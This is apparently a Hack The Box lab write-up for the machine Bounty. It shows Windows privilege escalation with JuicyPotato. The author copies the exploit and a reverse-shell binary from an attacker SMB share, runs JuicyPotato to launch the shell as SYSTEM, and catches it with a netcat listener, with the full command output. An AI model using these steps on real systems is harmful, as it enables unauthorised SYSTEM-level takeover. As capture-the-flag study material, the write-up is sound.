InfoSec LAB

Bounty_Privilege_Escalation

Created: 2 min read

JuicyPotato

JuicyPotato is notorious for any account with ==SeImpersonate or SeAssignPrimaryToken== privilege

c:\temp> copy \\10.10.14.5\smb\JuicyPotato.exe
        1 file(s) copied.
 
c:\temp> copy \\10.10.14.5\smb\pe.exe
        1 file(s) copied.

I transferred the exploit and reverse shell to the target machine over SMB

c:\temp> .\JuicyPotato.exe
JuicyPotato v0.1 
 
mandatory args: 
-t createprocess call: <t> CreateProcessWithTokenW, <u> CreateProcessAsUser, <*> try both
-p <program>: program to launch
-l <port>: COM server listen port
 
 
optional args: 
-m <ip>: COM server listen address (default 127.0.0.1)
-a <argument>: command line argument to pass to program (default NULL)
-k <ip>: RPC server ip address (default 127.0.0.1)
-n <port>: RPC server listen port (default 135)
-c <{clsid}>: CLSID (default BITS:{4991d34b-80a1-4291-83b6-3328366b9097})
-z only test CLSID and print token's user

JuicyPotato provides a help menu

The payload would be something like this below .\juicypotato.exe -t * -p "c:\temp\pe.exe" -l 7729

  • -t  to use both CreateProcessWithTokenW and CreateProcessAsUser
  • -p to launch the reverse shell program (pe.exe) with a higher privilege upon exploitation
  • -l to assign a random port number for the COM server to connect to
c:\temp> .\JuicyPotato.exe -t * -p "C:\temp\pe.exe" -l 7729
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 7729
....
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM
 
[+] CreateProcessWithTokenW OK

Exploit tested a CLSID of{4991d34b-80a1-4291-83b6-3328366b9097}

It’s a COM Object named “Background Intelligent Transfer Control Class 1.0” running on BITS(Background Intelligent Transfer Service) as NT AUTHORITY\SYSTEM

┌──(kali㉿kali)-[~/archive/htb/labs/bounty]
└─$ nnc 1231
listening on [any] 1231 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.93] 49232
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
 
c:\Windows\system32>whoami
nt authority\system
 
c:\Windows\system32>hostname
bounty
 
c:\Windows\system32>ipconfig
 
Windows IP Configuration
 
 
ethernet adapter local area connection:
 
   connection-specific dns suffix  . : 
   ipv4 address. . . . . . . . . . . : 10.10.10.93
   subnet mask . . . . . . . . . . . : 255.255.255.0
   default gateway . . . . . . . . . : 10.10.10.2
 
tunnel adapter isatap.{27c3f487-28ac-4ce6-ae3a-1f23518ef7a7}:
 
   media state . . . . . . . . . . . : Media disconnected
   connection-specific dns suffix  . :

and surely the juicypotato launched c:\temp\pe.exe as the shell came through

System Level Compromise

Interactive Graph View

Backlinks